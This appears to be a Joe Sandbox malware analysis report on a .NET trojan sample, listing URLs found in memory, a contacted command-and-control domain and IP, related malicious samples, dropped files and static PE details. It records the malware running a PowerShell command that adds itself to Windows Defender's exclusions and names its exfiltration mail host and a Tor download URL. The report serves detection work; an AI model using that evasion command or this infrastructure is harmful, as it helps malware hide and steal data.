                      http://DynDns.comDynDNS0%URL Reputationsafe
                      http://insergejk.com0%Avira URL Cloudsafe
                      http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                      http://uEmkbr.com0%Avira URL Cloudsafe
                      http://mail.insergejk.com0%Avira URL Cloudsafe
                      http://www.tiro.com0%URL Reputationsafe
                      http://www.goodfont.co.kr0%URL Reputationsafe
                      http://www.carterandcone.coml0%URL Reputationsafe
                      http://www.sajatypeworks.com0%URL Reputationsafe
                      http://www.typography.netD0%URL Reputationsafe
                      http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                      http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                      http://fontfabrik.com0%URL Reputationsafe
                      http://www.founder.com.cn/cn0%URL Reputationsafe
                      https://GfxT7Yj8XaSeYQqdvs.com0%Avira URL Cloudsafe
                      http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                      http://www.fontbureau.como0%URL Reputationsafe
                      http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                      http://www.sandoll.co.kr0%URL Reputationsafe
                      http://www.fontbureau.comoitud0%Avira URL Cloudsafe
                      http://www.urwpp.deDPlease0%URL Reputationsafe
                      http://www.zhongyicts.com.cn0%URL Reputationsafe
                      http://www.sakkal.com0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      insergejk.com
                      64.202.184.79
                      truetrueunknown
                      mail.insergejk.com
                      unknown
                      unknowntrueunknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://127.0.0.1:HTTP/1.1SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000007.00000002.937743659.0000000002BF1000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      low
                      http://www.apache.org/licenses/LICENSE-2.0SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.715869303.0000000006682000.00000004.00000001.sdmpfalse
                        high
                        http://www.fontbureau.comSecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.715869303.0000000006682000.00000004.00000001.sdmpfalse
                          high
                          http://www.fontbureau.com/designersGSecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.715869303.0000000006682000.00000004.00000001.sdmpfalse
                            high
                            http://DynDns.comDynDNSSecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000007.00000002.937743659.0000000002BF1000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://insergejk.comSecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000007.00000002.938832005.0000000002F4D000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.fontbureau.com/designers/?SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.715869303.0000000006682000.00000004.00000001.sdmpfalse
                              high
                              http://www.founder.com.cn/cn/bTheSecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.715869303.0000000006682000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%haSecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000007.00000002.937743659.0000000002BF1000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://www.fontbureau.com/designers?SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.715869303.0000000006682000.00000004.00000001.sdmpfalse
                                high
                                http://uEmkbr.comSecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000007.00000002.937743659.0000000002BF1000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://mail.insergejk.comSecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000007.00000002.938832005.0000000002F4D000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.tiro.comSecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.715869303.0000000006682000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://www.fontbureau.com/designersSecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.715869303.0000000006682000.00000004.00000001.sdmpfalse
                                  high
                                  http://www.goodfont.co.krSecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.715869303.0000000006682000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://www.carterandcone.comlSecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.715869303.0000000006682000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://www.sajatypeworks.comSecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.715869303.0000000006682000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://www.typography.netDSecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.715869303.0000000006682000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://www.fontbureau.com/designers/cabarga.htmlNSecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.715869303.0000000006682000.00000004.00000001.sdmpfalse
                                    high
                                    http://www.founder.com.cn/cn/cTheSecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.715869303.0000000006682000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://www.galapagosdesign.com/staff/dennis.htmSecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.715869303.0000000006682000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://fontfabrik.comSecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.715869303.0000000006682000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://www.founder.com.cn/cnSecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.715869303.0000000006682000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://www.fontbureau.com/designers/frere-user.htmlSecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.715869303.0000000006682000.00000004.00000001.sdmpfalse
                                      high
                                      https://GfxT7Yj8XaSeYQqdvs.comSecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000007.00000002.938814213.0000000002F47000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000007.00000002.937743659.0000000002BF1000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000007.00000003.916484773.0000000000C34000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000007.00000002.938715206.0000000002F10000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000007.00000002.938861011.0000000002F57000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.jiyu-kobo.co.jp/SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.715869303.0000000006682000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.fontbureau.comoSecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.712100291.0000000000C67000.00000004.00000040.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.galapagosdesign.com/DPleaseSecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.715869303.0000000006682000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.fontbureau.com/designers8SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.715869303.0000000006682000.00000004.00000001.sdmpfalse
                                        high
                                        http://www.fonts.comSecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.715869303.0000000006682000.00000004.00000001.sdmpfalse
                                          high
                                          http://www.sandoll.co.krSecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.715869303.0000000006682000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.fontbureau.comoitudSecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.712100291.0000000000C67000.00000004.00000040.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.urwpp.deDPleaseSecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.715869303.0000000006682000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.zhongyicts.com.cnSecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.715869303.0000000006682000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameSecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.712594836.0000000002601000.00000004.00000001.sdmpfalse
                                            high
                                            http://www.sakkal.comSecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.715869303.0000000006682000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zipSecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.713196181.0000000003609000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000007.00000002.935726036.0000000000402000.00000040.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            unknown

                                            Contacted IPs

                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs

                                            Public

                                            IPDomainCountryFlagASNASN NameMalicious
                                            64.202.184.79
                                            insergejk.comUnited States
                                            26496AS-26496-GO-DADDY-COM-LLCUStrue

                                            General Information

                                            Joe Sandbox Version:33.0.0 White Diamond
                                            Analysis ID:483768
                                            Start date:15.09.2021
                                            Start time:13:18:31
                                            Joe Sandbox Product:CloudBasic
                                            Overall analysis duration:0h 10m 23s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Sample file name:SecuriteInfo.com.Trojan.Mardom.MN.15.10720.19728 (renamed file extension from 19728 to exe)
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                            Number of analysed new started processes analysed:19
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:0
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • HDC enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Detection:MAL
                                            Classification:mal100.troj.spyw.evad.winEXE@6/5@2/1
                                            EGA Information:Failed
                                            HDC Information:
                                            • Successful, ratio: 1.4% (good quality ratio 0.9%)
                                            • Quality average: 42.7%
                                            • Quality standard deviation: 35.8%
                                            HCA Information:
                                            • Successful, ratio: 100%
                                            • Number of executed functions: 37
                                            • Number of non-executed functions: 4
                                            Cookbook Comments:
                                            • Adjust boot time
                                            • Enable AMSI
                                            Warnings:
                                            Show All
                                            • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                                            • Excluded IPs from analysis (whitelisted): 92.122.145.220, 20.82.210.154, 209.197.3.8, 20.54.110.249, 40.112.88.60, 23.216.77.209, 23.216.77.208
                                            • Excluded domains from analysis (whitelisted): displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, ctldl.windowsupdate.com, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, cds.d2s7q6s2.hwcdn.net, a1449.dscg2.akamai.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                            • Not all processes where analyzed, report is missing behavior information
                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                            • Report size getting too big, too many NtQueryValueKey calls found.

                                            Simulations

                                            Behavior and APIs

                                            TimeTypeDescription
                                            13:19:40API Interceptor660x Sleep call for process: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe modified
                                            13:19:49API Interceptor41x Sleep call for process: powershell.exe modified

                                            Joe Sandbox View / Context

                                            IPs

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            64.202.184.79Bill of Quantity & RFQ Specification Project form No Tender #100015520.exeGet hashmaliciousBrowse
                                              Remittance Transaction advice receipt_2021 08 30 0000230145.exeGet hashmaliciousBrowse
                                                Supplier order data sheet For June Delivery PO 4500101880.exeGet hashmaliciousBrowse
                                                  hkB5KuvPtB.exeGet hashmaliciousBrowse
                                                    bbva confirming Aviso de pago EUR5780020210104.exeGet hashmaliciousBrowse
                                                      bbva confirming Aviso de pago EUR5780020210104.exeGet hashmaliciousBrowse
                                                        bbva confirming Aviso de pago EUR5780020210104.exeGet hashmaliciousBrowse
                                                          DB payment transfer receipt E3S20092257312223020.exeGet hashmaliciousBrowse
                                                            DB payment transfer receipt E3S20092257310952020.exeGet hashmaliciousBrowse
                                                              Purchase Order & DWG data sheet Compliance form PO WH 5409.exeGet hashmaliciousBrowse
                                                                Oscar zGu5gCNIvVjLkVT.exeGet hashmaliciousBrowse

                                                                  Domains

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext

                                                                  ASN

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                  AS-26496-GO-DADDY-COM-LLCUSbank in slip.exeGet hashmaliciousBrowse
                                                                  • 107.180.56.180
                                                                  new order.exeGet hashmaliciousBrowse
                                                                  • 107.180.56.180
                                                                  NNDQR-797.vbsGet hashmaliciousBrowse
                                                                  • 107.180.72.43
                                                                  arrival notice.exeGet hashmaliciousBrowse
                                                                  • 184.168.131.241
                                                                  PO 56720012359.exeGet hashmaliciousBrowse
                                                                  • 107.180.44.148
                                                                  re2.armGet hashmaliciousBrowse
                                                                  • 192.169.135.20
                                                                  XbvAoRKnFm.exeGet hashmaliciousBrowse
                                                                  • 72.167.225.156
                                                                  STATEMENT OF ACCOUNT.exeGet hashmaliciousBrowse
                                                                  • 184.168.102.151
                                                                  Wg1UpQ3DEC.exeGet hashmaliciousBrowse
                                                                  • 184.168.131.241
                                                                  PO.exeGet hashmaliciousBrowse
                                                                  • 184.168.131.241
                                                                  2021091400983746_pdf.exeGet hashmaliciousBrowse
                                                                  • 184.168.131.241
                                                                  CLLKFIJI_(9-13-2021).xlsx.vbsGet hashmaliciousBrowse
                                                                  • 148.72.215.196
                                                                  Kopie dokladu o transakci_14_09_2021.exeGet hashmaliciousBrowse
                                                                  • 166.62.10.136
                                                                  G2aS9Rd9ys.exeGet hashmaliciousBrowse
                                                                  • 148.66.136.188
                                                                  Terw9bPuiD.exeGet hashmaliciousBrowse
                                                                  • 72.167.225.156
                                                                  UPDATED E-STATEMENT.exeGet hashmaliciousBrowse
                                                                  • 184.168.102.151
                                                                  prueba23.exeGet hashmaliciousBrowse
                                                                  • 184.168.131.241
                                                                  prueba22.exeGet hashmaliciousBrowse
                                                                  • 184.168.131.241
                                                                  fIlUUmpx1U.exeGet hashmaliciousBrowse
                                                                  • 72.167.225.156
                                                                  QUOTATION.exeGet hashmaliciousBrowse
                                                                  • 184.168.102.151

                                                                  JA3 Fingerprints

                                                                  No context

                                                                  Dropped Files

                                                                  No context

                                                                  Created / dropped Files

                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe.log
                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1216
                                                                  Entropy (8bit):5.355304211458859
                                                                  Encrypted:false
                                                                  SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                                                  MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                                                  SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                                                  SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                                                  SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                                                  Malicious:true
                                                                  Reputation:high, very likely benign file
                                                                  Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):22284
                                                                  Entropy (8bit):5.597731348621349
                                                                  Encrypted:false
                                                                  SSDEEP:384:DtCDuv2/jrFGE61gbX+RwSBKnSul62H7Y9gtrSJ3xCT1MabZlbAV7std0a5ZBDIr:Wq1g74KSulvTxcQCqfwgVQ
                                                                  MD5:87AC686A16C706FDE555F5DEB3EB065A
                                                                  SHA1:C801FF51848E1D147A6D47432FEF9D4D84E29850
                                                                  SHA-256:8200EE45995E22C2226382D905BBE51139E9EAE12EBF2E5B49627856D4B554EE
                                                                  SHA-512:15DCDE66F4864006C645451166FF3BC231FAE5CC6755771778110A8FD772996CF7256B0D7B23C5B58AF0AC0FC25873BCB0EA50C369F3DF0D8D0A03AE3EDD6FC9
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview: @...e...........|.......h..._.R.O.........F..........@..........H...............<@.^.L."My...:R..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dvugezh2.wz1.ps1
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:very short file (no magic)
                                                                  Category:dropped
                                                                  Size (bytes):1
                                                                  Entropy (8bit):0.0
                                                                  Encrypted:false
                                                                  SSDEEP:3:U:U
                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                  Malicious:false
                                                                  Reputation:high, very likely benign file
                                                                  Preview: 1
                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s5qjmgej.qvv.psm1
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:very short file (no magic)
                                                                  Category:dropped
                                                                  Size (bytes):1
                                                                  Entropy (8bit):0.0
                                                                  Encrypted:false
                                                                  SSDEEP:3:U:U
                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                  Malicious:false
                                                                  Reputation:high, very likely benign file
                                                                  Preview: 1
                                                                  C:\Users\user\Documents\20210915\PowerShell_transcript.116938.uyj91fg0.20210915131948.txt
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):5885
                                                                  Entropy (8bit):5.379572321006364
                                                                  Encrypted:false
                                                                  SSDEEP:96:BZRjSN0qDo1ZZZljSN0qDo1ZTaUijZbjSN0qDo1Z9GXyyhZG:2
                                                                  MD5:43816DD7D6137FD91A4291C66D58CC8F
                                                                  SHA1:51D0DA1420F630F6DD50E7AAF1A5702F64653108
                                                                  SHA-256:FFE9D27BE807B5C2D72EAF10741DF16CF2E4461857293A5266CCABC304C8BCC8
                                                                  SHA-512:870C8681E4BE196743A78321300C468ABD6FFFCC6F9F8D2305A2E1187408E31422B6AFA1DC19C9004FC40E2A96F8B58588C780E7ED26AE4649CEC0033D590DDC
                                                                  Malicious:false
                                                                  Preview: .**********************..Windows PowerShell transcript start..Start time: 20210915131949..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 116938 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe..Process ID: 6444..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210915131949..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe..**********************..Windows PowerShell transcript start..Start time: 20210915132412..Username: DESKTOP

                                                                  Static File Info

                                                                  General

                                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Entropy (8bit):7.388551225458123
                                                                  TrID:
                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                  • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                  • DOS Executable Generic (2002/1) 0.01%
                                                                  File name:SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe
                                                                  File size:769536
                                                                  MD5:f116c183d3684fe8c6d8435aef94fd41
                                                                  SHA1:f92ea1cee647bbbae7ed522450428607f4ae3ee4
                                                                  SHA256:9664d7052873349992d586788296c16579941a802a41b70afdc08867b2153d65
                                                                  SHA512:be706f0f8a6b7330d7f2d5e00c9e143e64b2614f1110ddd875db1409f7d86dcf76c2c6cb01839dba6db054009b7ef7007320d185a7659c23606b120fc0408069
                                                                  SSDEEP:12288:G4EI/yzQs2TmITIL2yxSwi95Ldxgco5/RJhvmCp+w8UmyWHCM2K4CPBI:G4REITILbx3indxgco5/RJhuK+wrme3F
                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...^.Aa..............0..N...n.......l... ........@.. ....................... ............@................................

                                                                  File Icon

                                                                  Icon Hash:f1f0f4d0eecccc71

                                                                  Static PE Info

                                                                  General

                                                                  Entrypoint:0x4b6c9e
                                                                  Entrypoint Section:.text
                                                                  Digitally signed:false
                                                                  Imagebase:0x400000
                                                                  Subsystem:windows gui
                                                                  Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                  DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                  Time Stamp:0x6141AD5E [Wed Sep 15 08:22:54 2021 UTC]
                                                                  TLS Callbacks:
                                                                  CLR (.Net) Version:v4.0.30319
                                                                  OS Version Major:4
                                                                  OS Version Minor:0
                                                                  File Version Major:4
                                                                  File Version Minor:0
                                                                  Subsystem Version Major:4
                                                                  Subsystem Version Minor:0
                                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                  Entrypoint Preview

                                                                  Instruction
                                                                  jmp dword ptr [00402000h]
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
